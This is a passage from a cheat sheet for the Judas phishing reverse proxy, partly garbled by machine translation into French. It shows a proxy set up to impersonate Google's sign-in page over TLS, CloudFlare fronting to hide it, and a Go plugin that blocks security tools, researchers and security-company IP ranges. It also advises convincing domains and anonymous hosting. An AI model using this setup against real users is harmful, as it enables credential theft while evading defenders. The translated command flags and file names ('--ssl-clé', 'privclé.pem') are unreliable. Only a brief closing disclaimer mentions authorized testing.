certbot certonly --standalone -d your-domain.com
# Use with Judas
judas --cible https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/your-domain.com/fullchain.pem \
--ssl-clé /etc/letsencrypt/live/your-domain.com/privclé.pem
Traffic Obfuscation
# Use CDN services (CloudFlare, AWS CloudFront)
# Implement realistic timing delays
# Use common ports (80, 443)
# Mimic legitimate traffic patterns
# exemple CloudFlare setup
# 1. Add domain to CloudFlare
# 2. Configure DNS records
# 3. Enable proxy (orange cloud)
# 4. Configure security settings
# 5. Point to Judas proxy
Anti-Detection Measures
// Implement anti-detection in Judas plugins
func (p *AntiDetectionPlugin) processusRequest(req *http.Request) error \\\\{
userAgent := req.UserAgent()
// Block security tools
securityTools := []string\\\\{
"curl", "wget", "python-requests", "scanner",
"bot", "crawler", "security", "research",
\\\\}
for _, tool := range securityTools \\\\{
if strings.Contains(strings.ToLower(userAgent), tool) \\\\{
return errors.New("blocked security tool")
\\\\}
\\\\}
// Check for known security company IP ranges
clientIP := getClientIP(req)
if isSecurityCompanyIP(clientIP) \\\\{
return errors.New("blocked security company IP")
\\\\}
return nil
\\\\}
dépannage
Common Issues
# port already in use
sudo netstat -tulpn|grep :8080
sudo kill -9 $(sudo lsof -t -i:8080)
# SSL certificat issues
# Check certificat validity
openssl x509 -in cert.pem -text -noout
# cible website blocking proxy
# Use different user agents
# Implement request delays
# Use proxy chains
# Plugin compilation errors
go mod tidy
go build -o plugin.so -buildmode=plugin plugin.go
Debug Mode
# Enable verbose logging
judas --cible https://exemple.com --address localhôte:8080 --verbose
# Check Judas logs
tail -f judas.log
# Test proxy functionality
curl -v http://localhôte:8080
# Verify SSL configuration
openssl s_client -connect localhôte:443
Performance Optimization
# Optimize for high traffic
# Increase file descriptor limits
ulimit -n 65536
# Monitor resource utilisation
htop
iotop
netstat -tulpn
# Use connexion pooling
# Implement caching
# Scale horizontally with load balancer
Best Practices
Campaign Planning
- cible analysis: Understand cible website structure and behavior
- Infrastructure setup: Use secure and anonymous hôteing
- Domain selection: Choose convincing domain names
- SSL implementation: Use legitimate SSL certificats
- Plugin development: Create custom plugins for specific needs
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorisation
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured identifiants
# Secure data transmission
# Implement data retention policies
# Regular security audits
Performance and Scalability
# Optimize proxy performance
# Use efficient plugins
# Implement caching strategies
# Monitor resource utilisation
# Scale infrastructure as needed
# exemple load balancing setup
# Use nginx or HAProxy
# Distribute traffic across multiple Judas instances
# Implement health checks
Resources
- Judas GitHub Repository
- Go Programming Language
- Reverse Proxy Concepts
- OWASP hameçonnage Guide
- Let's Encrypt SSL certificats
This aide-mémoire provides a comprehensive reference for using Judas hameçonnage proxy. Always ensure you have proper autorisation before conducting hameçonnage simulations or tests de pénétration.